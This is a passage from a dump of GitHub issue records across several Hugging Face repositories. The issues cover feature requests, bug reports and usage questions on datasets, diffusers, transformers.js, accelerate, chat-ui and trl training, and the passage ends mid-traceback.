wrapper has hugging faces funcitonaliy as well.\r\n\r\n```r\r\nlibrary(polars)\r\n\r\ndf <- pl$read_parquet(\"hf://datasets/SALURBAL/core__admin_cube_public/core__admin_cube_public.parquet\")\r\n```\r\n\r\n## Polars (python) option\r\n![image](https://github.com/user-attachments/assets/8f1bcd19-e578-4b18-b324-7cc00b80ac0a)\r\n\r\n\r\n## Libraries Currently\r\n\r\n![image](https://github.com/user-attachments/assets/0cf50063-f9db-443c-97b4-3ef0664b6e6e)\r\n\r\n\r\n\r\n\r\n### Motivation\r\n\r\nThere are many data/analysis/research/statistics teams (particularly in academia and pharma) that use R as the default language. R has great integration with most of the newer data techs (arrow, parquet, polars) and having this included could really help in bringing this community into the hugging faces ecosystem.\r\n\r\n**This is a small/low-hanging-fruit front end change but would make a big impact expanding the community**\r\n\r\n### Your contribution\r\n\r\nI am not sure which repositroy this should be in, but I have experience in R, Python and JS and happy to submit a PR in the appropriate repository. ", "url": "https://github.com/huggingface/datasets/issues/7226", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-10-14T19:56:07Z", "updated_at": "2024-10-14T19:57:13Z", "user": "ran-codes" }, { "repo": "huggingface/lerobot", "number": 472, "title": "How to resume training with a higher offline steps than initial set up?", "body": "### System Info\n\n```Shell\n- `lerobot` version: unknown\r\n- Platform: Linux-6.8.0-45-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.13\r\n- Huggingface_hub version: 0.25.2\r\n- Dataset version: 3.0.1\r\n- Numpy version: 1.26.4\r\n- PyTorch version (GPU?): 2.4.1 (True)\r\n- Cuda version: 11080\r\n- Using GPU in script?: \n```\n\n\n### Information\n\n- [X] One of the scripts in the examples/ folder of LeRobot\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n1. python lerobot/scripts/train.py \\\r\n hydra.run.dir=outputs/train/pusht\\\r\n device=cuda\r\n env=pusht_act \\\r\n env.task=pusht-v0 \\\r\n dataset_repo_id= takuzennn/pusht_v0 \\\r\n policy=act_pusht \\\r\n training.eval_freq=2000 \\\r\n training.log_freq=250 \\\r\n training.offline_steps=300000 \\\r\n training.save_model=true \\\r\n training.save_freq=2000 \\\r\n eval.n_episodes=30 \\\r\n eval.batch_size=12 \\\r\n wandb.enable=true \\\r\n\r\n2. python lerobot/scripts/train.py \\\r\n hydra.run.dir=outputs/train/pusht \\\r\n training.offline_steps=800000 \\\r\n resume=true\n\n### Expected behavior\n\nI expect it to stop at 800000 steps, but it still stops at 300000 steps.", "url": "https://github.com/huggingface/lerobot/issues/472", "state": "closed", "labels": [], "created_at": "2024-10-13T19:28:04Z", "updated_at": "2024-10-22T05:51:42Z", "user": "Takuzenn" }, { "repo": "huggingface/transformers.js", "number": 973, "title": "I would like to help ", "body": "### Question\r\n\r\nHi, I would like to help with the project. Is there anything that needs to be done?\r\n\r\nCurrently I found an issue, probably in ONNXRuntime. I will look into it next week. \r\n\r\nHere is example of WebGPU Whisper that works with mobile platforms including iPhone and Android: https://github.com/FL33TW00D/whisper-turbo\r\n\r\nCurrent Transformers.js solution have some bugs. It will crash after model loading, page will restart on mobile device. I tried to connect remote debugging to Chrome PC via some ios remote debugging bridge, but it just restarts and I cannot get any logs. Any help how to get logs would be appreciated as I don't have much experience with iOS Safari debugging and I also happen to have Windows PC.\r\n\r\nHere is photo from Safari - iPhone, you can see it does not support float32, but only float16. I suspect this is the issue and there are like 3 separate pull requests in ONNX to fix something around float16 support. But I did not have time to merge all current ONNX PRs and build it yet. First I would like to see some log with actual error\r\n![webgpu](https://github.com/user-attachments/assets/f1688652-3666-4619-a8ee-3f5949d5833a)\r\n\r\nThis is what I will be working on next weekend.\r\n\r\nIf there is something else I should look into or help with testing, let me know.\r\n\r\nThank you for great project and great work! :-)\r\n", "url": "https://github.com/huggingface/transformers.js/issues/973", "state": "open", "labels": [ "question" ], "created_at": "2024-10-12T20:29:07Z", "updated_at": "2024-10-14T19:37:51Z", "user": "cyberluke" }, { "repo": "huggingface/diffusers", "number": 9661, "title": "from_pretrained: filename argument removed?", "body": "**What API design would you like to have changed or added to the library? Why?**\r\n\r\nI do believe there was a `filename` argument in the past to load a specific checkpoint in a huggingface repository. It appears that this has been removed with no replacement.\r\n\r\n**What use case would this enable or better enable? Can you give us a code example?**\r\n\r\nIt's impossible to use any of the checkpoints here https://huggingface.co/SG161222/Realistic_Vision_V6.0_B1_noVAE/tree/main without manually downloading and using `from_single_file`. The checkpoint I want to load is called `Realistic_Vision_V6.0_NV_B1_fp16.safetensors`, but it seems that the procedure in `from_pretrained` tries to force and impose a specific name on the user. I understand the need for standards, but many have not respected the standards in the past and now these models cannot be used without additional work.", "url": "https://github.com/huggingface/diffusers/issues/9661", "state": "closed", "labels": [ "stale" ], "created_at": "2024-10-12T20:02:31Z", "updated_at": "2024-11-13T00:37:52Z", "comments": 4, "user": "oxysoft" }, { "repo": "huggingface/transformers", "number": 34107, "title": "How to specific customized force_token_ids in whisper", "body": "```\r\nValueError: A custom logits processor of type with values has been passed to `.generate()`, but it has already been created with the values . has been created by passing the corresponding arguments to generate or by the model's config default values. If you just want to change the default values of logits processor consider passing them as arguments to `.generate()` instead of using a custom logits processor\r\n```\r\n\r\nthis way don't work:\r\n\r\n```\r\ninputs = inputs.to(self.model.dtype)\r\n with torch.no_grad():\r\n if forced_decoder_ids is not None:\r\n generated_ids = self.model.generate(\r\n inputs, forced_decoder_ids=forced_decoder_ids\r\n )\r\n else:\r\n generated_ids = self.model.generate(inputs)\r\n```", "url": "https://github.com/huggingface/transformers/issues/34107", "state": "closed", "labels": [ "Generation", "Audio" ], "created_at": "2024-10-12T07:34:38Z", "updated_at": "2024-12-28T08:06:48Z", "user": "MonolithFoundation" }, { "repo": "huggingface/finetrainers", "number": 25, "title": "how to fix it ? training/cogvideox_text_to_video_lora.py FAILED", "body": "### System Info / \u7cfb\u7d71\u4fe1\u606f\n\ncuda11.8\r\nx2 3090\r\nlinux ubuntu 22.04 lts\r\npytorch2.4\r\n\r\n\n\n### Information / \u95ee\u9898\u4fe1\u606f\n\n- [X] The official example scripts / \u5b98\u65b9\u7684\u793a\u4f8b\u811a\u672c\n- [X] My own modified scripts / \u6211\u81ea\u5df1\u4fee\u6539\u7684\u811a\u672c\u548c\u4efb\u52a1\n\n### Reproduction / \u590d\u73b0\u8fc7\u7a0b\n\nandb: You can sync this run to the cloud by running:\r\nwandb: wandb sync /home/dev_ml/cogvideox-factory/wandb/offline-run-20241011_154425-t76nveyh\r\nwandb: Find logs at: wandb/offline-run-20241011_154425-t76nveyh/logs\r\n[rank0]:I1011 15:44:57.956000 124307873129088 torch/_dynamo/utils.py:335] TorchDynamo compilation metrics:\r\n[rank0]:I1011 15:44:57.956000 124307873129088 torch/_dynamo/utils.py:335] Function, Runtimes (s)\r\n[rank0]:V1011 15:44:57.956000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats constrain_symbol_range: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.956000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats evaluate_expr: CacheInfo(hits=0, misses=0, maxsize=256, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats _simplify_floor_div: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats _maybe_guard_rel: CacheInfo(hits=0, misses=0, maxsize=256, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats _find: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats has_hint: CacheInfo(hits=0, misses=0, maxsize=256, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats size_hint: CacheInfo(hits=0, misses=0, maxsize=256, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats simplify: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats _update_divisible: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats replace: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats _maybe_evaluate_static: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.958000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats get_implications: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.958000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats get_axioms: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.958000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats safe_expand: CacheInfo(hits=0, misses=0, maxsize=256, currsize=0)\r\n[rank0]:V1011 15:44:57.958000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats uninteresting_files: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\nW1011 15:45:01.515000 129677780091520 torch/distributed/elastic/multiprocessing/api.py:858] Sending process 177223 closing signal SIGTERM\r\nE1011 15:45:02.282000 129677780091520 torch/distributed/elastic/multiprocessing/api.py:833] failed (exitcode: 1) local_rank: 0 (pid: 177222) of binary: /home/dev_ml/cogvideox-factory/venv/bin/python3.10\r\nTraceback (most recent call last):\r\n File \"/home/dev_ml/cogvideox-factory/venv/bin/accelerate\", line 8, in \r\n sys.exit(main())\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/accelerate/commands/accelerate_cli.py\", line 48, in main\r\n args.func(args)\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/accelerate/commands/launch.py\", line 1159, in launch_command\r\n multi_gpu_launcher(args)\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/accelerate/commands/launch.py\", line 793, in multi_gpu_launcher\r\n distrib_run.run(args)\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/torch/distributed/run.py\", line 892, in run\r\n elastic_launch(\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/torch/distributed/launcher/api.py\", line 133, in __call__\r\n return launch_agent(self._config, self._entrypoint, list(args))\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/torch/distributed/launcher/api.py\", line 264, in launch_agent\r\n raise ChildFailedError(\r\ntorch.distributed.elastic.multiprocessing.errors.ChildFailedError: \r\n============================================================\r\ntraining/cogvideox_text_to_video_lora.py FAILED\r\n---------------------------------", "url": "https://github.com/huggingface/finetrainers/issues/25", "state": "closed", "labels": [], "created_at": "2024-10-11T08:49:23Z", "updated_at": "2024-12-23T07:40:41Z", "user": "D-Mad" }, { "repo": "huggingface/finetrainers", "number": 22, "title": "What resolution size is recommended for MP4 videos? What should the bitrate be set to? Should the video use H.264 or H.265 encoding?", "body": "About Dataset Preparation, \r\nWhat resolution size is recommended for MP4 videos? What should the bitrate be set to? Should the video use H.264 or H.265 encoding?\r\nexample\uff1a 1280X720, 5mbps below. recommended H.264 encoder.\r\n\r\nIs any suggestion here?", "url": "https://github.com/huggingface/finetrainers/issues/22", "state": "closed", "labels": [], "created_at": "2024-10-11T05:12:57Z", "updated_at": "2024-10-14T07:20:36Z", "user": "Erwin11" }, { "repo": "huggingface/accelerate", "number": 3156, "title": "how to load model with fp8 precision for inference?", "body": "### System Info\n\n```Shell\nis it posible to load the model using accelerate library with fp8 inference?\r\ni have H100 gpu accesses.\n```\n\n\n### Information\n\n- [X] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [X] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n```\r\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\r\n\r\nmodel_name = \"Qwen/Qwen2.5-72B-Instruct\"\r\n\r\nmodel = AutoModelForCausalLM.from_pretrained(\r\n model_name,\r\n torch_dtype=\"auto\",\r\n device_map=\"auto\"\r\n)\r\ntokenizer = AutoTokenizer.from_pretrained(model_name)\r\n\r\nprompt = \"Give me a short introduction to large language model.\"\r\nmessages = [\r\n {\"role\": \"system\", \"content\": \"You are Qwen, created by Alibaba Cloud. You are a helpful assistant.\"},\r\n {\"role\": \"user\", \"content\": prompt}\r\n]\r\ntext = tokenizer.apply_chat_template(\r\n messages,\r\n tokenize=False,\r\n add_generation_prompt=True\r\n)\r\nmodel_inputs = tokenizer([text], return_tensors=\"pt\").to(model.device)\r\n\r\ngenerated_ids = model.generate(\r\n **model_inputs,\r\n max_new_tokens=512\r\n)\r\ngenerated_ids = [\r\n output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)\r\n]\r\n\r\nresponse = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]\r\n\r\n```\n\n### Expected behavior\n\n...", "url": "https://github.com/huggingface/accelerate/issues/3156", "state": "closed", "labels": [], "created_at": "2024-10-11T04:31:47Z", "updated_at": "2024-12-02T15:07:58Z", "user": "imrankh46" }, { "repo": "huggingface/diffusers", "number": 9643, "title": "Flux does not support multiple Controlnets?", "body": "### Describe the bug\r\n\r\nI'm encountering an issue with the FluxControlNetPipeline. The `controlnet` parameter is supposed to accept a `List[FluxControlNetModel]`. However, when I attempt to execute my code, I run into the following error:\r\n\r\n```\r\nTraceback (most recent call last):\r\n File \"/opt/tiger/test_1/h.py\", line 8, in \r\n pipe = FluxControlNetPipeline.from_pretrained('/mnt/bn/x/sd_models/flux_schnell/', controlnet=controlnet, torch_dtype=torch.bfloat16).to(\"cuda\")\r\n File \"/opt/tiger/miniconda3/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/opt/tiger/miniconda3/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 940, in from_pretrained\r\n model = pipeline_class(**init_kwargs)\r\n File \"/opt/tiger/miniconda3/lib/python3.10/site-packages/diffusers/pipelines/flux/pipeline_flux_controlnet.py\", line 206, in __init__\r\n self.register_modules(\r\n File \"/opt/tiger/miniconda3/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 162, in register_modules\r\n library, class_name = _fetch_class_library_tuple(module)\r\n File \"/opt/tiger/miniconda3/lib/python3.10/site-packages/diffusers/pipelines/pipeline_loading_utils.py\", line 731, in _fetch_class_library_tuple\r\n library = not_compiled_module.__module__.split(\".\")[0]\r\nAttributeError: 'list' object has no attribute '__module__'. Did you mean: '__mul__'?\r\n```\r\n\r\n### Reproduction\r\n\r\n```\r\nimport torch\r\nfrom diffusers import FluxControlNetPipeline, FluxControlNetModel\r\n\r\ncontrolnet = [\r\n FluxControlNetModel.from_pretrained(\"InstantX/FLUX.1-dev-controlnet-canny\", torch_dtype=torch.bfloat16),\r\n FluxControlNetModel.from_pretrained(\"InstantX/FLUX.1-dev-controlnet-canny\", torch_dtype=torch.bfloat16),\r\n]\r\npipe = FluxControlNetPipeline.from_pretrained('/mnt/bn/x/sd_models/flux_schnell/', controlnet=controlnet, torch_dtype=torch.bfloat16).to(\"cuda\")\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\n- \ud83e\udd17 Diffusers version: 0.31.0.dev0\r\n- Platform: Linux-5.4.143.bsk.7-amd64-x86_64-with-glibc2.31\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.14\r\n- PyTorch version (GPU?): 2.3.1+cu121 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.24.5\r\n- Transformers version: 4.38.2\r\n- Accelerate version: 0.33.0\r\n- PEFT version: 0.12.0\r\n- Bitsandbytes version: 0.44.1\r\n- Safetensors version: 0.4.4\r\n- xFormers version: 0.0.27\r\n- Accelerator: NVIDIA A100-SXM4-80GB, 81920 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n### Who can help?\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9643", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-11T03:47:06Z", "updated_at": "2024-10-11T17:39:20Z", "comments": 1, "user": "RimoChan" }, { "repo": "huggingface/diffusers", "number": 9639, "title": "How to use my own trained lora in local computer?", "body": "local_model_path = r\"D:\\downloads\\FLUX.1-schnell\"\r\npipe = FluxPipeline.from_pretrained(local_model_path, torch_dtype=torch.bfloat16)\r\n#lora not working by this way\r\npipe.load_lora_weights(\"XLabs-AI/flux-lora-collection\", weight_name=\"disney_lora.safetensors\") \r\npipe.load_lora_weights(r\"D:\\AI\\stable-diffusion-webui-forge\\models\\Lora\\myflux\\myhsr.safetensors\")\r\npipe.fuse_lora()\r\npipe.unload_lora_weights()\r\n#pipe.enable_model_cpu_offload() #save some VRAM by offloading the model to CPU. Remove this if you have enough GPU power\r\npipe.enable_sequential_cpu_offload()\r\n\r\nBut it seems not loading my own lora properly.", "url": "https://github.com/huggingface/diffusers/issues/9639", "state": "closed", "labels": [], "created_at": "2024-10-10T23:19:47Z", "updated_at": "2024-11-10T08:49:08Z", "user": "derekcbr" }, { "repo": "huggingface/evaluation-guidebook", "number": 14, "title": "[TOPIC] How to design a good benchmark depending on your eval goals", "body": " Eval goals can be finding a good model for you vs ranking models vs choosing a good training config.\r\n \r\n Request by Luca Soldaini\r\n \r\n Cf https://x.com/soldni/status/1844409854712218042", "url": "https://github.com/huggingface/evaluation-guidebook/issues/14", "state": "closed", "labels": [], "created_at": "2024-10-10T16:20:40Z", "updated_at": "2025-09-18T08:31:15Z", "user": "clefourrier" }, { "repo": "huggingface/diffusers", "number": 9633, "title": "Confusion about accelerator.num_processes in get_scheduler", "body": "In the example code from [train_text_to_image_sdxl.py](https://github.com/huggingface/diffusers/blob/e16fd93d0a40156c1f49fde07f6f2eb438983927/examples/text_to_image/train_text_to_image_sdxl.py#L974):\r\n```python\r\nnum_warmup_steps = args.lr_warmup_steps * args.gradient_accumulation_steps\r\n```\r\nBut in [train_text_to_image.py](https://github.com/huggingface/diffusers/blob/e16fd93d0a40156c1f49fde07f6f2eb438983927/examples/text_to_image/train_text_to_image.py#L830):\r\n```python\r\nnum_warmup_steps_for_scheduler = args.lr_warmup_steps * accelerator.num_processes\r\n```\r\nWhy is there such a difference in these two cases?", "url": "https://github.com/huggingface/diffusers/issues/9633", "state": "closed", "labels": [ "stale" ], "created_at": "2024-10-10T08:39:12Z", "updated_at": "2024-11-09T15:37:33Z", "comments": 5, "user": "hj13-mtlab" }, { "repo": "huggingface/transformers.js", "number": 968, "title": "It's ready", "body": "### Question\r\n\r\nThe project I've been working on for the part few months is now ready-enough to reveal to the world. Transformers.js is an essential part of it, and I just want to say thank you for your amazing work.\r\n\r\nhttps://www.papeg.ai\r\n\r\nAs you can see in the source code, there are lots of workers that implement Transformers.js workers; translation, image description, STT, TTS, speaker verification, image- and music generation, RAG embedding, and more!\r\n\r\nhttps://github.com/flatsiedatsie/papeg_ai\r\n\r\nKeep on rockin' !\r\n\r\n// Reddit post: https://www.reddit.com/r/LocalLLaMA/comments/1g0jehn/ive_been_working_on_this_for_6_months_free_easy/\r\n\r\n(Feel free to close this issue at any time)", "url": "https://github.com/huggingface/transformers.js/issues/968", "state": "closed", "labels": [ "question" ], "created_at": "2024-10-10T04:39:48Z", "updated_at": "2025-05-29T22:49:24Z", "user": "flatsiedatsie" }, { "repo": "huggingface/datasets", "number": 7211, "title": "Describe only selected fields in README", "body": "### Feature request\n\nHi Datasets team! \r\n\r\nIs it possible to add the ability to describe only selected fields of the dataset files in `README.md`? For example, I have this open dataset ([open-llm-leaderboard/results](https://huggingface.co/datasets/open-llm-leaderboard/results?row=0)) and I want to describe only some fields in order not to overcomplicate the Dataset Preview and filter out some fields \n\n### Motivation\n\nThe `Results` dataset for the Open LLM Leaderboard contains json files with a complex nested structure. I would like to add `README.md` there to use the SQL console, for example. But if I describe the structure of this dataset completely, it will overcomplicate the use of Dataset Preview and the total number of columns will exceed 50 \n\n### Your contribution\n\nI'm afraid I'm not familiar with the project structure, so I won't be able to open a PR, but I'll try to help with something else if possible", "url": "https://github.com/huggingface/datasets/issues/7211", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-10-09T16:25:47Z", "updated_at": "2024-10-09T16:25:47Z", "comments": 0, "user": "alozowski" }, { "repo": "huggingface/transformers.js", "number": 965, "title": "Error: cannot release session. invalid session id", "body": "### Question\r\n\r\nI'm trying to get ASR + segmentation to run on a mobile phone (Pixel 6A, 6GB ram). This time on Brave mobile ;-)\r\n\r\nASR alone works fine. But I have a question about also getting the speaker recognition to run (segmentation+verification).\r\n\r\nIn the example implementation a `promiseAll` is used to run both ASR and Segmentation in paralel. For my implementation I've tried to run them one after the other, hoping that this would mean less memory is needed. E.g:\r\n\r\n- Create ASR instance\r\n-- Get text and chunks from audio\r\n- Dispose of ASR instance\r\n\r\n- Create segmentation instance\r\n-- Get segments from audio\r\n- Dispose of segmentation instance\r\n\r\n- Create verification instance\r\n-- Run verification on chunks of audio from each segment\r\n- Dispose of verification instance\r\n\r\nI don't know if it's related, but I noticed the error below:\r\n\r\n\"Screenshot\r\n\r\n\r\n\r\n\r\nMy questions are:\r\n- Is it a valid assumption that doing things consequtively will allow this cascade to run on devices with less memory? Or was there a good reason that a promiseAll was used?\r\n- What does the error mean?\r\n- Is running them consecutively part of why the error occurs?\r\n- Can I use `quantized` with the segmentation and verification models in order to save memory? Currently the ASR (tiny-whisper.en_timestamped) is 114MB, and then the segmentation and verification seem to be 512 MB together.\r\n\r\nI haven't split up loading the segmentation and verification instances yet, as I thought I'd get your opinion first.\r\n\r\n```\r\nclass SegmentationSingleton {\r\n \r\n static instance = null;\r\n\t\r\n static segmentation_model_id = 'onnx-community/pyannote-segmentation-3.0';\r\n static segmentation_instance = null;\r\n static segmentation_processor = null;\r\n\tstatic loaded_segmentation = false;\r\n\t\r\n\tstatic verification_model_id = 'Xenova/wavlm-base-plus-sv'; // Xenova/wavlm-base-plus-sv\r\n //static verification_model_id = 'onnx-community/wespeaker-voxceleb-resnet34-LM';\r\n static verification_instance = null;\r\n static verification_processor = null;\r\n\t\r\n\tstatic instance_exists(){\r\n\t\treturn this.segmentation_instance != null;\r\n\t}\r\n\t\r\n\tstatic set_to_null(var_to_null=null){\r\n\t\tif(typeof var_to_null == 'string' && typeof this[var_to_null] != 'undefined'){\r\n\t\t\tthis[var_to_null] = null;\r\n\t\t\t//console.log(\"SegmentationSingleton: set_to_null: \", var_to_null);\r\n\t\t}\r\n\t}\r\n\r\n\r\n //static async getInstance(progress_callback=null,model_name='onnx-community/whisper-base_timestamped',preferences={},load_segmentation=true) {\r\n\tstatic async getInstance(progress_callback=null,preferences={}) {\r\n\t\t//console.log(\"Whisper_worker: SegmentationSingleton: getInstance\");\r\n\t\t\r\n\t\tif(self.is_mobile){\r\n\t\t\tconsole.log(\"mobile, so setting quantized to true for segmentation AI's\");\r\n\t\t\tpreferences['quantized'] = true;\r\n\t\t\t\r\n\t\t}\r\n\t\t\r\n\t\tthis.loaded_segmentation = true\r\n\r\n\t\tconsole.log(\"segmentationSingleton: creating segmentation instances\");\r\n\t\t\r\n this.segmentation_processor ??= AutoProcessor.from_pretrained(this.segmentation_model_id, {\r\n\t\t\t...preferences,\r\n progress_callback,\r\n });\r\n\t\t\r\n this.segmentation_instance ??= AutoModelForAudioFrameClassification.from_pretrained(this.segmentation_model_id, {\r\n // NOTE: WebGPU is not currently supported for this model\r\n // See https://github.com/microsoft/onnxruntime/issues/21386\r\n device: 'wasm',\r\n //dtype: 'fp32',\r\n\t\t\tdtype: 'q8',\r\n\t\t\t...preferences,\r\n progress_callback,\r\n });\r\n\t\r\n\t\tif(this.verification_model_id.endsWith('wespeaker-voxceleb-resnet34-LM')){\r\n\t\t\tself.similarity_threshold = 0.5;\r\n\t\t\tself.perfect_simillarity_threshold = 0.7;\r\n\t\t}\r\n\t\telse{\r\n\t\t\tself.similarity_threshold = 0.95;\r\n\t\t\tself.perfect_simillarity_threshold = 0.98;\r\n\t\t}\r\n\t\r\n this.verification_processor ??= AutoProcessor.from_pretrained(this.verification_model_id, {\r\n device: 'wasm',\r\n dtype: 'fp32',\r\n\t\t\t//device: 'webgpu',\r\n\t\t\t//dtype: 'q8',\r\n\t\t\t...preferences,\r\n progress_callback,\r\n });\r\n\t\r\n this.verification_instance ??= AutoModel.from_pretrained(this.verification_model_id, {\r\n device: 'wasm',\r\n dtype: 'fp32',\r\n\t\t\t//device: 'webgpu',\r\n\t\t\t//dtype: 'q8',\r\n\t\t\t...preferences,\r\n progress_callback,\r\n });\r\n\r\n return Promise.all([this.segmentation_processor, this.segmentation_instance, this.verification_processor, this.verification_instance]);\r\n \r\n }\r\n}\r\n\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/965", "state": "open", "labels": [ "question" ], "created_at": "2024-10-09T13:57:48Z", "updated_at": "2024-10-09T15:51:02Z", "user": "flatsiedatsie" }, { "repo": "huggingface/chat-ui", "number": 1509, "title": "(BUG) Oath login splash is BROKEN/does NOT work", "body": "On newer versions of chat-ui the login splash screen does not work. Say for instance you have oauth setup and are not logged in. You should get a popup prompting you to logina nd not see the interface. This used to work without a problem. I just realized this no longer working on the newer versions. I have oauth set up through huggingface working perfectly. \r\n\r\nNote.. even though the splash is not shown someone would be prevented from using the chatbot as it just wont work if your not logged in. However i kinda like the splash.. Anyone know how to get this working again?? already messed with it? save me some time. thank you huggingface for creating this project. Are we going to be getting any of the newer options being implemented into Huggingchat like specifically the continue button and new search/agent control popup panel vs just search on/off?? Thanks and wish yall the best\r\n\r\n***Splash on 0.8.4 (Working)\r\n![image](https://github.com/user-attachments/assets/7ada285f-9ff4-4700-8342-e985d14b2d12)\r\n\r\n***Splash on 0.9.3 (Not Working)\r\n![image](https://github.com/user-attachments/assets/613fab7e-aff5-4225-9b65-ad073fff49a1)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1509", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-08T18:06:01Z", "updated_at": "2024-11-27T15:02:46Z", "comments": 2, "user": "bpawnzZ" }, { "repo": "huggingface/trl", "number": 2196, "title": "How to exit training when the loss is less than a specified value in SFTTrainer?", "body": "I asked this question in ChatGPT first, it gave the answer below:\r\n```\r\nfrom trl import SFTTrainer\r\nfrom transformers import TrainingArguments\r\nfrom unsloth import is_bfloat16_supported\r\n\r\n# Define customized Trainer class\r\nclass CustomSFTTrainer(SFTTrainer):\r\n def __init__(self, *args, min_loss_threshold=0.001, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n self.min_loss_threshold = min_loss_threshold\r\n\r\n def train(self, *args, **kwargs):\r\n # Rewrite the train() method to monitor the loss.\r\n for step, batch in enumerate(self.get_train_dataloader()):\r\n outputs = self.model(**batch)\r\n loss = outputs.loss\r\n\r\n loss.backward()\r\n self.optimizer.step()\r\n self.lr_scheduler.step()\r\n self.optimizer.zero_grad()\r\n\r\n # If the loss is less than a specified value, exit training.\r\n if loss.item() < self.min_loss_threshold:\r\n print(f\"Stopping training early at step {step} as loss {loss.item()} is below threshold {self.min_loss_threshold}\")\r\n break \r\n\r\n # Print loss log.\r\n if step % self.args.logging_steps == 0:\r\n print(f\"Step {step}, Loss: {loss.item()}\")\r\n\r\n# Initialize the customized Trainer.\r\ntrainer = CustomSFTTrainer(\r\n model=model,\r\n tokenizer=tokenizer,\r\n train_dataset=ds_split['train'],\r\n dataset_text_field=\"text\",\r\n max_seq_length=max_seq_length,\r\n dataset_num_proc=2,\r\n min_loss_threshold=0.001, # Specify the loss threshold\r\n args=TrainingArguments(\r\n per_device_train_batch_size=2,\r\n gradient_accumulation_steps=4,\r\n\r\n warmup_steps=5,\r\n max_steps=200,\r\n\r\n learning_rate=2e-4,\r\n fp16=not is_bfloat16_supported(),\r\n bf16=is_bfloat16_supported(),\r\n logging_steps=1,\r\n optim=\"adamw_8bit\",\r\n weight_decay=0.01,\r\n lr_scheduler_type=\"linear\",\r\n seed=3407,\r\n output_dir=\"outputs\",\r\n ),\r\n)\r\n\r\ntrainer.train()\r\n```\r\nHowever, the code above occurred error as below:\r\n`# Calls into the C++ engine to run the backward pass RuntimeError: one of the variables needed for gradient computation has been modified by an inplace operation: [torch.cuda.FloatTensor [2, 482, 3584]], which is output 0 of MulBackward0, is at version 1; expected version 0 instead. Hint: enable anomaly detection to find the operation that failed to compute its gradient, with torch.autograd.set_detect_anomaly(True). `\r\n\r\nI feedbacked the erorr to ChatGPT, it advised to add 2 lines in the code:\r\n```\r\n ...\r\n loss = outputs.loss\r\n\r\n # Avoid inplace-updating\r\n loss = loss.clone()\r\n \r\n loss.backward()\r\n ...\r\n```\r\nI re-ran the code, it occurred errors as below:\r\n```\r\nRuntimeError Traceback (most recent call last)\r\n[](https://localhost:8080/#) in ()\r\n 1 